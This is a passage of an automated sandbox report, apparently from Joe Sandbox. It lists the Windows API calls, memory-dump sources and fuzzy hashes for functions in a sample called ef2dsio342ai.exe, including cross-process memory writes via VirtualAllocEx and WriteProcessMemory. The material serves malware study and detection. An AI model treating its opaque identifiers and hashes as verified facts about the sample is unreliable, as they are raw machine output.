
                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00D718BA
                                                                                                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00D718C6
                                                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00D718D5
                                                                                                      • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00D718DC
                                                                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00D718F2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 44706859-0
                                                                                                      • Opcode ID: 7636ec6aaf40919e8a09201cbb180a5e6ee97adbcd99c2b78667f33e8b450a2c
                                                                                                      • Instruction ID: 5f6f7bded28929813c9c1d698ce912a8371dfc42bdf4ba7708400d8c8595ee14
                                                                                                      • Opcode Fuzzy Hash: 7636ec6aaf40919e8a09201cbb180a5e6ee97adbcd99c2b78667f33e8b450a2c
                                                                                                      • Instruction Fuzzy Hash: 83F06D79200301BBDB114FA8EC49F563BAEEF8A761F144424FA4ACB360EB74DD408A70
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00D7185A
                                                                                                      • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00D71866
                                                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00D71875
                                                                                                      • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00D7187C
                                                                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00D71892
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 44706859-0
                                                                                                      • Opcode ID: 2ac076c0c0991fcb34fcf033ee63f9045c1e6d6b7f845cb0c5090f7ab8c7a39c
                                                                                                      • Instruction ID: ac8797436634e92869ad1a14912f9748c5c9a685cc4dfefcd31325b110203f32
                                                                                                      • Opcode Fuzzy Hash: 2ac076c0c0991fcb34fcf033ee63f9045c1e6d6b7f845cb0c5090f7ab8c7a39c
                                                                                                      • Instruction Fuzzy Hash: 55F04F79240301BBDB110B689C49F563F6EEF8A761F144414F94AC7360DA75DC008A70
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00D80A39,?,00D83C56,?,00000001,00D53ACE,?), ref: 00D80BE0
                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00D80A39,?,00D83C56,?,00000001,00D53ACE,?), ref: 00D80BED
                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00D80A39,?,00D83C56,?,00000001,00D53ACE,?), ref: 00D80BFA
                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00D80A39,?,00D83C56,?,00000001,00D53ACE,?), ref: 00D80C07
                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00D80A39,?,00D83C56,?,00000001,00D53ACE,?), ref: 00D80C14
                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00D80A39,?,00D83C56,?,00000001,00D53ACE,?), ref: 00D80C21
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseHandle
                                                                                                      • String ID:
                                                                                                      • API String ID: 2962429428-0
                                                                                                      • Opcode ID: d3f2a6c0341827ed5615f3d0d990ee8446be59a11739ab00817e6add84e35d44
                                                                                                      • Instruction ID: f683dba7a0fa019767c0e744f00841ea7aaa0f99d15482e90d2e2616604688ca
                                                                                                      • Opcode Fuzzy Hash: d3f2a6c0341827ed5615f3d0d990ee8446be59a11739ab00817e6add84e35d44
                                                                                                      • Instruction Fuzzy Hash: 9C01AE71801B16DFCB30AF66D980816FBF9EF503193198A3ED19252931C7B1A989CFA0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00D764E7
                                                                                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 00D764FE
                                                                                                      • MessageBeep.USER32(00000000), ref: 00D76516
                                                                                                      • KillTimer.USER32(?,0000040A), ref: 00D76532
                                                                                                      • EndDialog.USER32(?,00000001), ref: 00D7654C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 3741023627-0
                                                                                                      • Opcode ID: 1d473d382107a17c7e3450d8c6e6acb16425821c4a0c65ee067f7b892d5c8f8b
                                                                                                      • Instruction ID: c37f9b1e43e35a72af190531b20495f1ecc30e41e2fc4bfa2052d389647e3698
                                                                                                      • Opcode Fuzzy Hash: 1d473d382107a17c7e3450d8c6e6acb16425821c4a0c65ee067f7b892d5c8f8b
                                                                                                      • Instruction Fuzzy Hash: 2E018630500708ABEB245B10DD4EB967779FB11B05F084559B587E24E1FBF4EA54DB70
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • _free.LIBCMT ref: 00D4DAF2
                                                                                                        • Part of subcall function 00D42D58: RtlFreeHeap.NTDLL(00000000,00000000,?,00D4DB71,00DE1DC4,00000000,00DE1DC4,00000000,?,00D4DB98,00DE1DC4,00000007,00DE1DC4,?,00D4DF95,00DE1DC4), ref: 00D42D6E
                                                                                                        • Part of subcall function 00D42D58: GetLastError.KERNEL32(00DE1DC4,?,00D4DB71,00DE1DC4,00000000,00DE1DC4,00000000,?,00D4DB98,00DE1DC4,00000007,00DE1DC4,?,00D4DF95,00DE1DC4,00DE1DC4), ref: 00D42D80
                                                                                                      • _free.LIBCMT ref: 00D4DB04
                                                                                                      • _free.LIBCMT ref: 00D4DB16
                                                                                                      • _free.LIBCMT ref: 00D4DB28
                                                                                                      • _free.LIBCMT ref: 00D4DB3A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 776569668-0
                                                                                                      • Opcode ID: 32fd44104303c4dcfdc310696776be5a95975b37c69513fc0efe5ef55810a922
                                                                                                      • Instruction ID: 14e4883350629ab53413c3c10143d7a43e5680ddfc86112c5ff67dbf2b2ffbc9
                                                                                                      • Opcode Fuzzy Hash: 32fd44104303c4dcfdc310696776be5a95975b37c69513fc0efe5ef55810a922
                                                                                                      • Instruction Fuzzy Hash: B8F03C72945748678615EB64E985D1677EFEF447107D90C16F00DD7511C770FCC08AB4
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • _free.LIBCMT ref: 00D4264E
                                                                                                        • Part of subcall function 00D42D58: RtlFreeHeap.NTDLL(00000000,00000000,?,00D4DB71,00DE1DC4,00000000,00DE1DC4,00000000,?,00D4DB98,00DE1DC4,00000007,00DE1DC4,?,00D4DF95,00DE1DC4), ref: 00D42D6E
                                                                                                        • Part of subcall function 00D42D58: GetLastError.KERNEL32(00DE1DC4,?,00D4DB71,00DE1DC4,00000000,00DE1DC4,00000000,?,00D4DB98,00DE1DC4,00000007,00DE1DC4,?,00D4DF95,00DE1DC4,00DE1DC4), ref: 00D42D80
                                                                                                      • _free.LIBCMT ref: 00D42660
                                                                                                      • _free.LIBCMT ref: 00D42673
                                                                                                      • _free.LIBCMT ref: 00D42684
                                                                                                      • _free.LIBCMT ref: 00D42695
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 776569668-0
                                                                                                      • Opcode ID: b1fa64b749f4488b03988140a4f6378e45f15189b6bf759398c57a1a6ed56999
                                                                                                      • Instruction ID: a5bb4092168b5dce7d6c2c6275caee68930aa0dd37e377f259009dc3a9f57770
                                                                                                      • Opcode Fuzzy Hash: b1fa64b749f4488b03988140a4f6378e45f15189b6bf759398c57a1a6ed56999
                                                                                                      • Instruction Fuzzy Hash: AFF0FE759423A09B8B06BF94BC8586C3B69FF147613850A1BF514DA375C7B10982EFF8
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • EndPath.GDI32(?), ref: 00D11E74
                                                                                                      • StrokeAndFillPath.GDI32(?,?,00D53258,00000000,?,?,?), ref: 00D11E90
                                                                                                      • SelectObject.GDI32(?,00000000), ref: 00D11EA3
                                                                                                      • DeleteObject.GDI32 ref: 00D11EB6
                                                                                                      • StrokePath.GDI32(?), ref: 00D11ED1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                      • String ID:
                                                                                                      • API String ID: 2625713937-0
                                                                                                      • Opcode ID: fdd830eed34b75c08569429b205a5c91d409c33abd5083592e85efb92379efbe
                                                                                                      • Instruction ID: 8b08e39bdb7927d4623a9c2f1482219710a03a1f1ecb9600822c89efb86bcb73
                                                                                                      • Opcode Fuzzy Hash: fdd830eed34b75c08569429b205a5c91d409c33abd5083592e85efb92379efbe
                                                                                                      • Instruction Fuzzy Hash: 6FF0F630041348ABDB256F64ED4C7B63BAAA741322F449214F966986F1CB348896DF30
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __freea$_free
                                                                                                      • String ID: a/p$am/pm
                                                                                                      • API String ID: 3432400110-3206640213
                                                                                                      • Opcode ID: 3ebf0b17cee9428ded63e8ea72ab378a6f0b49b977123c2e2d9dd4501aeff77b
                                                                                                      • Instruction ID: daac864be6e121c5f8506e43c91aa0be50ffab5c4bcbdb2393ed137f161ece65
                                                                                                      • Opcode Fuzzy Hash: 3ebf0b17cee9428ded63e8ea72ab378a6f0b49b977123c2e2d9dd4501aeff77b
                                                                                                      • Instruction Fuzzy Hash: ECD1DF79A00206DBDB289F68C8857FABBB1FF05310F2D4159E986AB251D235DDC0CBB1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 00D7BCDF: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00D72A60,?,?,00000034,00000800,?,00000034), ref: 00D7BD09
                                                                                                      • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00D72FF0
                                                                                                        • Part of subcall function 00D7BCAA: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00D72A8F,?,?,00000800,?,00001073,00000000,?,?), ref: 00D7BCD4
                                                                                                        • Part of subcall function 00D7BC06: GetWindowThreadProcessId.USER32(?,?), ref: 00D7BC31
                                                                                                        • Part of subcall function 00D7BC06: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00D72A24,00000034,?,?,00001004,00000000,00000000), ref: 00D7BC41
                                                                                                        • Part of subcall function 00D7BC06: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00D72A24,00000034,?,?,00001004,00000000,00000000), ref: 00D7BC57
                                                                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00D7305D
                                                                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00D730AA
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                      • String ID: @
                                                                                                      • API String ID: 4150878124-2766056989
                                                                                                      • Opcode ID: 932b08482e2f43ad0e8391198389f18d8e47b0a9d4add3503d6db4aec0bf3120
                                                                                                      • Instruction ID: 8e4054ba25103f07a6a006fcdccc39a0298fa9ff147f4b8f54844ba9cd48d248
                                                                                                      • Opcode Fuzzy Hash: 932b08482e2f43ad0e8391198389f18d8e47b0a9d4add3503d6db4aec0bf3120
                                                                                                      • Instruction Fuzzy Hash: 2C415D76A00218BFDB11DFA4CC85ADEBBB8EB05310F048055F949B7180DA716E85DB70
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\wql455oi0\ef2dsio342ai.exe,00000104), ref: 00D41AF9
                                                                                                      • _free.LIBCMT ref: 00D41BC4
                                                                                                      • _free.LIBCMT ref: 00D41BCE
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free$FileModuleName
                                                                                                      • String ID: C:\wql455oi0\ef2dsio342ai.exe
                                                                                                      • API String ID: 2506810119-793445372
                                                                                                      • Opcode ID: e8ad7a81f8d8e4660dd2fd0cbc981d566231ce786cbb04975920897e4733289c
                                                                                                      • Instruction ID: 642d0f126daaefbca3013c83e0b38a6365be3c976706881d4ebe6ec8ad7b5d67
                                                                                                      • Opcode Fuzzy Hash: e8ad7a81f8d8e4660dd2fd0cbc981d566231ce786cbb04975920897e4733289c
                                                                                                      • Instruction Fuzzy Hash: DC316375A00358ABDB21DF99DC85DAEBBBCEB85350B144166E50497210E6B08E80DBB0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00D7CAC6
                                                                                                      • DeleteMenu.USER32(?,00000007,00000000), ref: 00D7CB0C
                                                                                                      • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00DE2990,01364998), ref: 00D7CB55
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Menu$Delete$InfoItem
                                                                                                      • String ID: 0
                                                                                                      • API String ID: 135850232-4108050209
                                                                                                      • Opcode ID: fe2cf1e91c86459eeb69cf550bf772774f52151bff2e97d38ad2a8c553baed57
                                                                                                      • Instruction ID: 24534b928bfcb65eb05e1264ef64e720dd796468374a74fa0bd3b09466e7b789
                                                                                                      • Opcode Fuzzy Hash: fe2cf1e91c86459eeb69cf550bf772774f52151bff2e97d38ad2a8c553baed57
                                                                                                      • Instruction Fuzzy Hash: D841D0306153419FD720DF24D886F5ABBE4EF85320F04861DF9A997291E730E904CBB2
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00DADCD0,00000000,?,?,?,?), ref: 00DA4E09
                                                                                                      • GetWindowLongW.USER32 ref: 00DA4E26
                                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00DA4E36
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$Long
                                                                                                      • String ID: SysTreeView32
                                                                                                      • API String ID: 847901565-1698111956
                                                                                                      • Opcode ID: 59969b51fb2e87a0589e2f3184522ce127d84f4e2bd466a5d715666264d756d1
                                                                                                      • Instruction ID: 71ff2d1cdb2fb61efec428bdd0de9788e2fa9dd21e7c36c0997130968eba48de
                                                                                                      • Opcode Fuzzy Hash: 59969b51fb2e87a0589e2f3184522ce127d84f4e2bd466a5d715666264d756d1
                                                                                                      • Instruction Fuzzy Hash: 0F315C31100205AFDF619F78DC45BEA7BA9EB4A334F284715F975922E0DBB0A9509B70
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 00D93CB8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00D939D4,?,?), ref: 00D93CD5
                                                                                                      • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00D939D7
                                                                                                      • _wcslen.LIBCMT ref: 00D939F8
                                                                                                      • htons.WSOCK32(00000000,?,?,00000000), ref: 00D93A63
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                                                      • String ID: 255.255.255.255
                                                                                                      • API String ID: 946324512-2422070025
                                                                                                      • Opcode ID: 5d1a80d232ed0ea7f55b76f573dfec47564e8d32680c5b641b3f21a726537b97
                                                                                                      • Instruction ID: 97d28865083757b5feb4317e24aad1c09972956be4487a7cea8d42a3cdcc18d1
                                                                                                      • Opcode Fuzzy Hash: 5d1a80d232ed0ea7f55b76f573dfec47564e8d32680c5b641b3f21a726537b97
                                                                                                      • Instruction Fuzzy Hash: B631B1396002019FCF10CF68C585EAA7BF1EF15318F288099E8968B3A2D735EE45CB70
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00DA489F
                                                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00DA48B3
                                                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00DA48D7
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
